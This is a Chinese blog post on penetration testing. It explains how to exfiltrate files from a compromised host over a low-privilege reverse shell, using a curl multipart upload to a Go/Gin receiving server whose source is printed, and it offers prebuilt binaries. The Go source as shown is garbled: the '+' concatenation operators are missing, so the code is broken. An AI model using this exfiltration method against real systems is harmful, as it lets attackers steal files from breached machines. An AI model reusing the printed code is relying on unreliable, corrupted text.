渗透测试|利用curl回传文件

2022-09-08 11:42:45 浏览数 (1)

至少我们曾经在一起过。

来自:一言

var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();

说明

现在有一种情况,反弹了一个低权限的shell[aru_17],然后该网站又没有web服务,然后用scp命令也是权限不够(需要验证密码),通过网上查询方法说使用 sshpass 可以进行带密码执行scp命令,但是需要安装这个命令,当前权限并不能安装该命令[aru_28],所以在大表哥的提示下,可以采用curl命令进行文件回传的操作。[aru_21]

条件

1.一台服务器(这个肯定要的[aru_13])

2.目标服务器能够执行curl命令。

方法

1.采用golang编写一个简单的获取文件上传的后端(用golang的话可以避免安装环境等操作,当然你也可以用别的语言来搞一个[aru_62])

点击查看后端源码

main.go文件

代码语言:javascript复制
package main

import (
	"flag"
	"go-upload/runserver"
)

func main() {
	filedir := flag.String("f", "", "保存路径")
	lport := flag.String("p", "8088", "运行端口")
	flag.Parse()
	if *filedir != "" && *lport != "" {
		runserver.Runserver(*filedir, *lport)
	} else {
		flag.Usage()
	}
}

root.go文件

代码语言:javascript复制
package runserver

import (
	"fmt"
	"github.com/gin-gonic/gin"
	"net/http"
)

/*
* @Author: A
* @Date:   2021/7/6 11:32
 */

func Runserver(filedir string, lport string) {
	r := gin.Default()
	b := filedir
	r.POST("/upload", func(c *gin.Context) {
		file, err := c.FormFile("file")
		//fmt.Println(file.Filename)
		s := b   "/"   file.Filename
		if err != nil {
			c.String(500, "err")
		}
		// c.JSON(200, gin.H{"message": file.Header.Context})
		err = c.SaveUploadedFile(file, s)
		if err != nil {
			c.String(http.StatusOK, "err")
		}
		c.String(http.StatusOK, "ok")
	})
	r.Run(":"   lport)
}

2.curl命令参数(根据环境更改)

代码语言:javascript复制
curl -F "file=@文件路径" http://localhost:8088/upload
##上传成功会回显ok

下载

上方提供了源码,如果懒得编译的可以直接下载。编译了windows和linux下64位的运行程序。

蓝奏云

0 人点赞